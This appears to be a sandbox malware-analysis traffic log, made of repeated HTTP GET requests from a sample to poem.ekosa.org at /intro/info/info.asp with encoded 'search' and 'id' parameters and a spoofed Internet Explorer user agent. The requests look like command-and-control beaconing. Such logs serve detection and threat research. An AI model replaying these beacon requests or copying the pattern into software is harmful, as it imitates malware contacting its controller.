Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
